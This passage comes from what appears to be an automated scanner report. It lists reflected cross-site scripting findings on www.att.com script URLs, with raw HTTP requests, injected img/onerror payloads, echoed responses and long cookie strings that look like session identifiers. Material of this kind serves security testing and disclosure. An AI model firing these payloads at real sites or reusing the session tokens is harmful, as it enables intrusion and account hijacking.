foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9104
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:30 GMT
Connection: keep-alive
Set-Cookie: TLTHID=989492E40B8C100B76A1DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/ATT-Olam-english-mtagconfig.jsfa54a"><img src=a onerror=alert(1)>5c75d840cee">
...[SNIP]...

1.21. https://www.att.com/olam/js/Ajax.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/Ajax.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c82"><img%20src%3da%20onerror%3dalert(1)>4477fb3dd0f was submitted in the REST URL parameter 2. This input was echoed as b9c82"><img src=a onerror=alert(1)>4477fb3dd0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsb9c82"><img%20src%3da%20onerror%3dalert(1)>4477fb3dd0f/Ajax.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9081
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:24:10 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsb9c82"><img src=a onerror=alert(1)>4477fb3dd0f/Ajax.js">
...[SNIP]...

1.22. https://www.att.com/olam/js/Ajax.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/Ajax.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c1d"><img%20src%3da%20onerror%3dalert(1)>33d2548c778 was submitted in the REST URL parameter 3. This input was echoed as 82c1d"><img src=a onerror=alert(1)>33d2548c778 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/Ajax.js82c1d"><img%20src%3da%20onerror%3dalert(1)>33d2548c778 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9081
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:24:17 GMT
Connection: keep-alive
Set-Cookie: TLTHID=6D51DD1C0B8C100B7412DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/Ajax.js82c1d"><img src=a onerror=alert(1)>33d2548c778">
...[SNIP]...

1.23. https://www.att.com/olam/js/UserMessaging.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/UserMessaging.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36226"><img%20src%3da%20onerror%3dalert(1)>576ff8abf90 was submitted in the REST URL parameter 2. This input was echoed as 36226"><img src=a onerror=alert(1)>576ff8abf90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js36226"><img%20src%3da%20onerror%3dalert(1)>576ff8abf90/UserMessaging.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9090
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:24:43 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js36226"><img src=a onerror=alert(1)>576ff8abf90/UserMessaging.js">
...[SNIP]...

1.24. https://www.att.com/olam/js/UserMessaging.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/UserMessaging.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e3de"><img%20src%3da%20onerror%3dalert(1)>a6d62b5f2eb was submitted in the REST URL parameter 3. This input was echoed as 1e3de"><img src=a onerror=alert(1)>a6d62b5f2eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/UserMessaging.js1e3de"><img%20src%3da%20onerror%3dalert(1)>a6d62b5f2eb HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9090
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:24:50 GMT
Connection: keep-alive
Set-Cookie: TLTHID=80E0FEA80B8C100B74E5DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/UserMessaging.js1e3de"><img src=a onerror=alert(1)>a6d62b5f2eb">
...[SNIP]...

1.25. https://www.att.com/olam/js/cookie.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/cookie.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7295"><img%20src%3da%20onerror%3dalert(1)>9b561b29061 was submitted in the REST URL parameter 2. This input was echoed as b7295"><img src=a onerror=alert(1)>9b561b29061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsb7295"><img%20src%3da%20onerror%3dalert(1)>9b561b29061/cookie.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9083
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:22 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsb7295"><img src=a onerror=alert(1)>9b561b29061/cookie.js">
...[SNIP]...

1.26. https://www.att.com/olam/js/cookie.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/cookie.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c14a"><img%20src%3da%20onerror%3dalert(1)>d000f5a1ef0 was submitted in the REST URL parameter 3. This input was echoed as 2c14a"><img src=a onerror=alert(1)>d000f5a1ef0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/cookie.js2c14a"><img%20src%3da%20onerror%3dalert(1)>d000f5a1ef0 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9083
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:30 GMT
Connection: keep-alive
Set-Cookie: TLTHID=98659CDC0B8C100B769DDD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/cookie.js2c14a"><img src=a onerror=alert(1)>d000f5a1ef0">
...[SNIP]...

1.27. https://www.att.com/olam/js/cssBrowserSelector.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/cssBrowserSelector.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45d2"><img%20src%3da%20onerror%3dalert(1)>3346b059c1b was submitted in the REST URL parameter 2. This input was echoed as a45d2"><img src=a onerror=alert(1)>3346b059c1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsa45d2"><img%20src%3da%20onerror%3dalert(1)>3346b059c1b/cssBrowserSelector.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
